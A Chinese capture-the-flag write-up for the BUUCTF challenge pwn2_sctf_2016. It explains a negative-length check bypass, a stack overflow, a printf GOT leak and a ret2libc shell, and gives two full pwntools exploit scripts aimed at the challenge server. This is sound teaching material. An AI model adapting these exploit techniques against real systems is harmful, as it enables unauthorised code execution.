buuctf中的pwn2_sctf_2016(libc泄露+栈溢出)

首先checksec检查保护机制:

-32位程序

-仅开启了栈不可执行保护

接下来使用反汇编攻击IDA进行分析:

发现vuln函数,并且从左边没有发现任何后门函数

vuln函数内部:

首先要我们输入后门读取的字节数,这里要是输入大于32就会直接退出程序,不过我们可以直接输入-1,v2就会变成一个非常大的数,能在后面实现栈溢出,这里看出偏移量为0x2c+0x4

由于没有任何后门函数和地址,只能通过泄露libc地址来计算出system函数和/bin/sh地址,这里首先想到用LibcSearcher去找libc,但是可能又是LibcSearcher中libc库不全的问题,我始终找不到匹配的libc库,最后从题目给出的做题环境是Ubuntu16并且是32位程序猜到libc库是libc-2.23.so才做出题目

这是有LibcSearcher版本的exp脚本:

这里说一下思路,由于这里不知道libc库的基地址,所以需要两次栈溢出,第一次溢出先泄露出printf_got的地址,再计算得到libc基址进而计算出system函数地址和/bin/sh地址,第二次溢出就注入system函数拿到shell,但是由于LibcSearcher的问题,始终找不到匹配的libc库

python 复制代码
from pwn import *
from LibcSearcher import LibcSearcher
context(arch='i386', os='linux', log_level='debug')

#io = process('./pwn')             # 在本地运行程序。
# gdb.attach(io)                    # 启动 GDB
io = connect('node5.buuoj.cn',26718)              # 与在线环境交互。

offset = 0x2c + 0x4
vuln_addr = 0x804852F

elf = ELF("./pwn")
printf_got = elf.got['printf']
printf_plt = elf.plt['printf']

io.recvuntil(b'How many bytes do you want me to read? ')
io.sendline(b'-1')

io.recvuntil(b'bytes of data!\n')
payload = b'a'*offset + p32(printf_plt) + p32(vuln_addr) + p32(printf_got)
io.sendline(payload)

io.recvuntil(b'\n')
printf_addr = u32(io.recv(4).ljust(4,b'\x00'))
print(hex(printf_addr))

libc = LibcSearcher('printf',printf_addr)
libc_base = printf_addr - libc.dump('printf')
system_addr = libc_base + libc.dump('system')
bin_sh_addr = libc_base + libc.dump('str_bin_sh')

io.recvuntil(b'How many bytes do you want me to read? ')
io.sendline(b'-1')

io.recvuntil(b'bytes of data!\n')
payload = b'a'*offset + p32(system_addr) + p32(vuln_addr) + p32(bin_sh_addr)
io.sendline(payload)

io.interactive()

这里已知libc库的版本:

思路和上面基本一样,只不过是把LibcSearhcher那里改一下而已

python 复制代码
from pwn import *
context(arch='i386', os='linux', log_level='debug')

#io = process('./pwn')             # 在本地运行程序。
# gdb.attach(io)                    # 启动 GDB
io = connect('node5.buuoj.cn',28509)              # 与在线环境交互。

offset = 0x2c + 0x4
vuln_addr = 0x804852F

libc = ELF('./libc-2.23.so')
elf = ELF("./pwn")
printf_got = elf.got['printf']
printf_plt = elf.plt['printf']

io.recvuntil(b'How many bytes do you want me to read? ')
io.sendline(b'-1')

io.recvuntil(b'bytes of data!\n')
payload = b'a'*offset + p32(printf_plt) + p32(vuln_addr) + p32(printf_got)
io.sendline(payload)

io.recvuntil(b'\n')
printf_addr = u32(io.recv(4).ljust(4,b'\x00'))
print(hex(printf_addr))

libc_base = printf_addr - libc.sym['printf']
system_addr = libc_base + libc.sym['system']
bin_sh_addr = libc_base + next(libc.search('/bin/sh'))

io.recvuntil(b'How many bytes do you want me to read? ')
io.sendline(b'-1')

io.recvuntil(b'bytes of data!\n')
payload = b'a'*offset + p32(system_addr) + p32(vuln_addr) + p32(bin_sh_addr)
io.sendline(payload)

io.interactive()

这是运行结果:

最后手动输入cat flag得到flag即可

相关推荐
不做无法实现的梦~3 分钟前
PX4 机载电脑 Linux 环境安装、串口、网络、ROS 完整配置
linux·运维·网络
嵌入式×边缘AI:打怪升级日志3 分钟前
嵌入式Linux开发(了解交叉编译工具链的组成)
java·linux·运维
李小白202002029 分钟前
RK3568 linux6.1 死机
linux·运维·服务器
byoass10 分钟前
企业云盘权限管理深度对比:巴别鸟、联想Filez、腾讯企微云盘
网络·安全·云计算·企业微信
FreeGo~12 分钟前
Linux 系统编程 进程篇 (五)
java·linux·服务器
杨云龙UP23 分钟前
Oracle数据库启动失败:ORA-29701、ORA-01565、ORA-17503故障处理记录_20260429
linux·运维·数据库·oracle·centos
RkxI7soAM36 分钟前
冷钱包选购的安全标准答案:锁定Ledger官方授权店铺
人工智能·安全
FastCAE202236 分钟前
【FastCAE-OpenRadioss案例分享】飞机风挡玻璃鸟撞安全分析
安全·显式动力学
暗夜猎手-大魔王41 分钟前
转载--AI Agent 架构设计:安全与可控性设计(OpenClaw、Claude Code、Hermes Agent 对比)
人工智能·安全
handler011 小时前
Git 核心指令速查
linux·c语言·c++·笔记·git·学习